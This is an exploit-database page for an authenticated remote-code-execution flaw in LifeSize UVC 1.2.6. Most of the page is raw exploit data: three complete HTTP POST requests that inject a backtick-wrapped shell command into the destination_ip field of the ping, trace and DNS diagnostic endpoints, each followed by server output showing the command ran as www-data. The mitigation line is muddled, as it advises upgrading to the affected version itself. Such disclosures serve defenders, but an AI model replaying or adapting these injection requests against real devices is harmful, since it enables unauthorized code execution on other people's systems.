header-logo
Suggest Exploit
vendor:
UVC
by:
Anonymous
9,8
CVSS
HIGH
Remote Code Execution (RCE)
78
CWE
Product Name: UVC
Affected Version From: 1.2.6
Affected Version To: 1.2.6
Patch Exists: YES
Related CWE: N/A
CPE: a:lifesize:uvc:1.2.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2020

LifeSize UVC 1.2.6 authenticated vulnerabilities

An authenticated user can execute arbitrary code on the LifeSize UVC 1.2.6 system by sending a specially crafted POST request to the server-admin/operations/diagnose/ping/, server-admin/operations/diagnose/trace/ and server-admin/operations/diagnose/dns/ endpoints. The POST request contains a malicious source_ip parameter which contains a command to be executed on the server. The command is executed as the www-data user.

Mitigation:

Upgrade to the latest version of LifeSize UVC 1.2.6 or later.
Source

Exploit-DB raw data:

LifeSize UVC 1.2.6 authenticated vulnerabilities
 
RCE as www-data:
 
POST /server-admin/operations/diagnose/ping/ HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.99/server-admin/operations/diagnose/ping/
Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
 
csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=goo`whoami`gle.com
 
The above POST results in a response containing:
<span class="red_txt">ping: unknown host goowww-datagle.com</span><br/>
 
 
 
 
 
RCE as www-data:
 
POST /server-admin/operations/diagnose/trace/ HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.99/server-admin/operations/diagnose/trace/
Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
 
csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com
 
Results in the following error:
gowww-dataogle.com: Name or service not known
 
 
 
 
 
 
RCE as www-data:
 
POST /server-admin/operations/diagnose/dns/ HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.99/server-admin/operations/diagnose/dns/
Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
 
csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com&query_type=ANY
 
Results in the following results:
; <<>> DiG 9.7.0-P1 <<>> -t ANY gowww-dataogle.com -b 172.31.16.99
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54663
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
 
;; QUESTION SECTION:
;gowww-dataogle.com. IN ANY
 
;; AUTHORITY SECTION:
com. 890 IN SOA a.gtld-servers.net. nstld.verisign-grs.com. 1395411948 1800 900 604800 86400
 
;; Query time: 21 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Fri Mar 21 10:26:21 2014
;; MSG SIZE rcvd: 109

Navigation

Suggest Exploit

Services By CQR